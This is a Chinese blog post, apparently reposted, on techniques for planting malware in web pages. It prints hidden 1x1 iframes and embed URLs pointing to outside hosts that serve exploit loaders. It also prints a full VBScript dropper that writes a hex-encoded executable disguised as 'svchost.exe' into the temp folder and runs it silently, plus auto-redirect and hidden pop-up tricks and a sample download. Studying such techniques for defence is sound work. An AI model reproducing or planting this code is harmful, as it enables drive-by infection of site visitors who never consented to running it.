Virus_Html_SampleAnalysis

来源：互联网发布：js offsetwidth取不到编辑：程序博客网时间：2024/06/05 05:28

本篇讲Html的挂马的常见手法.

0x1 简单的html挂马–frame框架

查看站点是否被挂，一般是查找一下关键词iframe。

<iframe src=https://www.baidu.com/ width=1300 height=250 ></iframe><iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>---下面是网上的,还未理解国外的load.exedocument.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.chura.pl/rc/pdf.php?id=546983' type='application/pdf'></embed>";break;}}var url="http://jl.chura.pl/rc/load.php?id=546983"http://jl.chura.pl/rc/load.php?id=546983&spl=3http://jl.chura.pl/rc/load.php?id=546983&spl=2

0x2 VBScript写入本地文件

<SCRIPT Language=VBScript><!--DropFileName = "svchost.exe"WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005258727E16391C2D16391C2D16391C2DD536412D1B391C2D16391D2D54391C2D31FF6E2D17391C2D31FF602D17391C2D31FF642D17391C2D5269636816391C2D000000000000000000000000000000000000000000000000504500004C010500119D4A4D0000000000000000E0000F010B01080000080000009A0100000000000011000000100000002000000000400000100000000200000400000000000000040000000000000000A002000004000000000000020000040000100000100000000010000010000000000000100000000000000000000000602100008C00000000900100003400000000000000000000000000000000000000D00100C000000000000000000000000000000000000000000000000000000000000000000000000020000020000000000000000000000000200000200100000000000000000000000000000000000000000000000000002E74657874000000D6060000738358CF862426BBFC82B47B01DA3FCB87320E37BC0A66ED8E8EF2E1B457025C371A591A6882818FD0111D6F53B984F2384E3BDDC5A6271A345B8D0F1C965D8F81DDF0130D04BC42AA295485249ADD5D2466635C1E26A99F02FF353B7F1BE614C925A4241C65F3965E3A34343921512A71E9993F1ACD145D075C609908C16BA186F8A72090E79FD5F3EC5354EC642D34548478CA6667B6DC05B18C2199557C9FE45BA97808DC244D5D4C6AE6D136F8F9B3DCDC01E4235A2179650DA44EB0741B67664E57955F90BBCC9C3CF62A1BFA11860A8AF9B24C5B6CEF63A4B3B822E1400E911523D5C6AB67F59F8E0FA70553187AE4C3A0CB8831DB9FA73C1C1007857048D26582F678D0B2A43A129E85F51EE7688F0C296310EA43A5978848EB74708A39AE0A7840354D021BCD8E5D0308194A7EE925765ACB57D3A7C73A0D0EA9871B7A4F36A809BC2C5C60C42E1F7D94A05D4955A9B34A5AA828820A449D60B686257131A16D023C5A5FC6DFE74664AFAD424CF354060F9D3009567044674FDC137012F940CF9846D7E3AC89A7EC06373F7F4903320A65328DAF4903320F4903320F4903320F4903320F4903320F4903320F4903320"Set FSO = CreateObject("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>

0x3 最后跳向这里

擦,下面的不用代码标记框起来，会直接跳转…

<body onload="window.location ='http://cn.bing.com/?scope=web';"></body>

0x4 待测的方式

1.<meta http-equiv="refresh" content="0; url=data:text/html; base64,....">2.<script language="javascript" src="http://cn.bing.com/?scope=web/js"</script>3.window.open("","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");　4.<p><a id="qipian" href="http://bbs.pediy.com/"></a></p>5.<a href="https://www.baidu.com/" target="_blank">

0x5Samples

Sample-请确认样本只用于测试才下载,其他的我可不负-密码国际惯例

0x6 参考文章

网页挂马方法和技巧大汇总

阅读全文

0 0